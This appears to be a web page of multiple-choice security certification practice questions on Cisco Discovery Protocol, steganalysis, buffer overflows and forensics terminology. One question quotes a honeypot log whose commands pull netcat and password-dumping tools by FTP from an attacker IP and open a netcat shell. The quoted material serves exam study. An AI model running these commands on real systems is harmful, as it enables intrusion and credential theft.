Your company uses Cisco routers exclusively throughout the network. After securing the routers to the best of your knowledge, an outside security firm is brought in to assess the network security.
Although they found very few issues, they were able to enumerate the model, OS version, and capabilities for all your Cisco routers with very little effort. Which feature will you disable to eliminate the ability to enumerate this information on your Cisco routers?

• A.Simple Network Management Protocol
• B.Broadcast System Protocol
• C.Border Gateway Protocol
• D.Cisco Discovery Protocol

Comment: *

Name: *

Email: *

Verification: *

In Steganalysis, which of the following describes a Known-stego attack?

• A.Original and stego-object are available and the steganography algorithm is known
• B.Only the steganography medium is available for analysis
• C.During the communication process, active attackers can change cover
• D.The hidden message and the corresponding stego-image are known

Comment: *

Name: *

Email: *

Verification: *

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?

• A.It is a local exploit where the attacker logs in using username johna2k
• B.There are two attackers on the system - johna2k and haxedj00
• C.The attack is a remote exploit and the hacker downloads three files
• D.The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Comment: *

Name: *

Email: *

Verification: *

Buffer overflow vulnerability of a web application occurs when it fails to guard its buffer properly and allows writing beyond its maximum size. Thus, it overwrites the_________. There are multiple forms of buffer overflow, including a Heap Buffer Overflow and a Format String Attack.

• A.Adjacent bit blocks
• B.Adjacent memory locations
• C.Adjacent string locations
• D.Adjacent buffer locations

Comment: *

Name: *

Email: *

Verification: *

Harold is finishing up a report on a case of network intrusion, corporate spying, and embezzlement that he has been working on for over six months. He is trying to find the right term to use in his report to describe network-enabled spying. What term should Harold use?

• A.Spycrack
• B.Hackspionage
• C.Spynet
• D.Netspionage

Comment: *

Name: *

Email: *

Verification: *